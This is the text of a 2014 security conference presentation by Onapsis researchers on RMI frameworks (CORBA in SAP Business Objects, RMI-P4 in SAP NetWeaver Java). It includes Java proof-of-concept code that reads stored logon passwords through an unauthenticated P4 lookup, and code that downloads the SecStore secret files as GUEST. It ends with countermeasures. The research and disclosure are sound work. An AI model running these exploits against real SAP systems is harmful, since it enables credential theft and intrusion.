CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved03/12/2014
1
Title goes hereNahuel D. Sánchez Sergio [email protected] [email protected]
@serj_ab
Dissecting and Attacking RMI Frameworks
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
This presentation contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver,
Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned
herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all
over the world.
Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web
Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks
or registered trademarks of Business Objects in the United States and/or other countries.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content,
and SAP Group shall not be liable for errors or omissions with respect to the materials.
Disclaimer
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Onapsis Inc. Overview
Transforming how organizations protect the applications that manage their business-critical processes and information.
Founded: 2009
Locations: Buenos Aires, AR | Boston, MA | Berlin, DE | Lyon, FR
Technology: Onapsis X1 (Auditor Solution)
Onapsis Security Platform (Enterprise Solution)
(PCT patent-pending)
Pricing: Subscription-based (Enterprise, Audit On-Demand and MSP)
Research: 130+ SAP security advisories and presentations published
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Who are We?
Sergio: SAP Security Specialist
Nahuel: Security Researcher
• Reported more than 25 vulnerabilities in different SAP Products
• Onapsis Blog contributors
• Authors of Onapsis SAP Security In-Depth Publications
• Speakers/Trainers at Ekoparty, Hubcon, SANS
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Introduction• What is RMI?
• RMI Implementations
• RMI vs Web Services
CORBA implementation• Basic concepts (IDL’s, IOR’s)
• CORBA and SAP Business Objects
• Attacks
P4 implementation• Basic Concepts
• P4 and SAP NetWeaver
Conclusions
Agenda
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI stands for Remote Method Invocation
Conceptually similar to RPC (Remote Procedure Call)
Allows the invocation of clients running on remote machines
Introduction | What is RMI?
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Same Idea, different implementation
Both allow users to execute actions in the server
RMI• 15-20 years old• Complex (objects management, garbage collection)• Provide interfaces for legacy systems • Stateful• A more profitable attack target
Web Services
• 15-20 years old
• Stateless
• Aware of RMI limitations/problems when developed
RMI vs Web Services
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Products using RMI-based protocols
• Jboss Application Server (Java-RMI)
• Oracle Weblogic Server (Weblogic-RMI)
• IBM Lotus Domino (Java-RMI)
• Apache Axis2 (CORBA)
In this talk
• SAP Business Objects (CORBA)
• SAP Netweaver Java (RMI-P4)
Introduction | What is RMI? Cont’d
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
So…What is SAP?
SAP (Systems, Applications and Products in Data Processing) is a German
company devoted to the development of business solutions.
Founded in 1972.
Almost 67,000 employees.*
More than 253,000 customers.*
Presence in most countries
Third biggest independent software vendor (ISV).
• http://www.sap.com/corporate-en/about/our-company/index.html• http://en.wikipedia.org/wiki/SAP_SE
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
SAP Solutions
Enterprise Solutions
SAP CRM (Customer Relationship Management).
SAP ERP (Enterprise Resource Planning).
SAP SCM (Supply Chain Management).
SAP SRM (Supplier Relationship Management).
Business Solutions
SAP GRC (Government, Risk and Compliance).
SAP Portal
SAP Solution Manager
SAP Business Objects
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA implementation
Common Object Request Broker Architecture
Connect different software components (local/remote)
Language agnostic
Object oriented
Provides “Objectization” to non-object languages like C or COBOL
http://pubs.opengroup.org-onlinepubs-9279299-apdxa.htm
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Common Object Request Broker Architecture
http://www.cs.wustl.edu/schmidt-corba-overview.html
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA – Locating objects
CORBA Naming Service
• Implemented as an “Object Service”
• Provides a way to locate other objects
CorbaLoc & CorbaName URLs
• Similar to “common” URLs
corbaloc:: target:1234/MyObjectKey
corbaname::target:1234/NameService#Hello/World
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA – Locating objects
IOR:010000003500000049444c3a696d672e73656167617465736f6674776172652e636f6d2f
_IIOP_ParseCDR: byte order LittleEndian, repository id<IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1>, 1 profile_IIOP_ParseCDR: profile 1 is 70 bytes, tag 0 (INTERNET), LittleEndian byte order(iiop.c:parse_IIOP_Profile): bo=LittleEndian, version=1.1, hostname=BO4WV,port=1056, object_key=<....`hjR........>object key is <#00#00#00#00`hjR#88#C5#0C#00#02#00#00#00>;no trustworthy most-specific-type info; unrecognized ORB type;reachable with IIOP 1.1 at host "BO4WV", port 1056
Interoperable Object References (IOR)
• Object key
• IP Address
• Listening port
• Repository ID
Parsed IOR:
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA – IDLs
Interface Definition Language (IDLs)
• Define objects
• Shared by the client and the server
• Language specific compilation
Example IDL interface
//fortune.idl
Module Fortune {
interface CookieServer {
string get_cookie();
};
};
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA & SAP Business Objects
Used to inter-process communications only
SAP doesn’t provide IDLs for objects
Options we have:
• Reverse engineering IDLs from classes (PITA)
Import JAVA Jar files and use it directly
Files required:
• corbaidl.jar
• ebus405.jar
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
CORBA & SAP Business Objects
The BOE Central Management Server (CMS)
• Platform’s brain
• Keeps track of all enabled services/servers
Name server port
• Port TCP 6400 (default)
• Applications use this port for first contact
Request port
• Dynamic port by default
• Used by all applications after first request
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
What we need to attack in a BO implementation?
CMS IP
CMS Static Port
CMS IOR
SRV’s IORs
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Obtaining the CMS IOR
Obtained through traffic analysis
Client sends string “aps” to CMS static port (6400)
CMS returns its IOR
Needed to further attacks
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
SAP proprietary protocol
Present in every SAP Netweaver Application Server Java
Combines features of Java RMI and CORBA
Listens on port: 5XX04, (5XX06 for SSL)
Can be tunneled through HTTP!!! P4HTTP (5XX05)
Enables client-server communication:
• Locating remote objects
• Communication with remote objects
• Loading classes remotely
Examples:
• SAP Enterprise Portal
• SAP Solution Manager
https://help.sap.com/saphelp_nwce711/helpdata/en/48/295738a14558d8e10000000a421937/content.htm
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
Where is specifically RMI-P4 used?
• Real example: JMX (Java Management Extensions)
o Allows building manageable distributed Java Apps
start/stop/restart
changing configuration
backup/import settings/so on…
client-server architecture based on: RMI-P4
In fact... SAP Netweaver Application Server Java is based on a JMX Architecture
http://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=73160
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
Basic implementation
• Server-side:
public interface HelloWorld extends java.rmi.Remote {public void hello();
}
public class HelloWorldImpl implements HelloWorld {public void Hello() {
System.out.println(“Hello World”);}
}
• Server and Client-side:
RMI-P4 does not use IDLs (as CORBA).
Interfaces are already known by the client since they are defined in both sides.
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
How to find and invoke a remote object?
JNDI (Java Native Directory Interface)
Standard Java API
Allows applications to access multiple naming and directory services via a common
interface
Two very interesting features:
Naming Service
Directory Service
https://help.sap.com/saphelp_nwce711/helpdata/en/99/e8b84172133131e10000000a155106/content.htm
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
public class BankClient {
Properties p = new Properties();
// Specify the type of the InitialContext factory.
p.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, “p4://” args[0] + ":" + args[1]); //Specify the
URL.
p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.
p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.
Context initialContext = new InitialContext(p); // Connect to the server by
the InitialContext.
Account account = (Account) initialContext.lookup("Bank");
// Invoke methods remotely.
account.deposit(100);
System.out.println("Balance:" + account.getBalance());
System.out.println("Try to draw...");
account.draw(50);
System.out.println("Balance:" + account.getBalance());
} catch (Exception ex) {
ex.printStackTrace();
}}
}
RMI-P4
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
What happens if we do not specify this?
The user is logged as GUEST and.. as every application defines its own security
requirements… It only takes one missing authorization check in order to get full access!
https://help.sap.com/saphelp_nw73ehp1/helpdata/en/e9/88435b5d84b24e8c62048ff36bd600/content.htmhttp://help.sap-ag.de/saphelp_nw73/helpdata/de/4a/eac9a0cd2823aee10000000a42189c/frameset.htm
p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.
p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
Attack 1: Authentication Credentials Disclosure
Example of application of this attack: System Landscape Directory
• Central information repository
• Consolidates all systems, hardware and software components• Allows administration of systems
o Installationo Updates and patcheso Interfaces
• Mandatory in every SAP implementation
http://help.sap.com/saphelp_nw70/helpdata/en/21/84570b3ae14e77b3047c82218974b9/content.htm
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
RFCRuntimeInterface_Stub o =
(RFCRuntimeInterface_Stub)initialContext.lookup("rfcengine");
BundleConfiguration[] bc = o.getConfigurations();
for (int i = 0; i < bc.length; i++) {
String data =
bc[i].getLogonClient()+":”+bc[i].getLogonUser()+":"+bc[i].getLogonPassword();
System.out.println(data);
Attack 1: Authentication Credentials Disclosure
RMI-P4
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
RMI-P4
Attack 2: Anonymous Remote File Read/Write
Targeted service: File Transfer Service API• SAP Ready-to-Use Service• Allows upload/download of files to/from the AppServer• Most common use case: deploy of java applications• Main problem: Lack of authorization checks.
o Consequence: Accessible by GUEST user!
http://help.sap.com/saphelp_oil472/helpdata/en/48/1d813ecfd43546e10000000a114084/content.htm
One more step…Get Secure Store:
• Secure Store container (SecStore.properties)• Secure Store key (SecStore.key)• Decrypt! (3DES)
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
String source = “C:\tmp\SecStore.properties”
String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”
com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
f.download();
RMI-P4
Attack 2: Anonymous Remote File Read/Write
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
String source = “C:\tmp\SecStore.properties”
String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”
com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
f.download();
RMI-P4
Attack 2: Anonymous Remote File Read/Write
Protection / Countermeasure
Secure P4 service (5XX04, 5XX05, 5XX06)
Apply all SAP Security Notes. Keep the systems up-to-date.
Implement SAP Security Notes 1682613 and 1819822.
Check the “References” slide for more information!
CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved 38
Title goes hereNahuel D. Sánchez Sergio [email protected] [email protected]
@serj_ab
Questions?
Top Related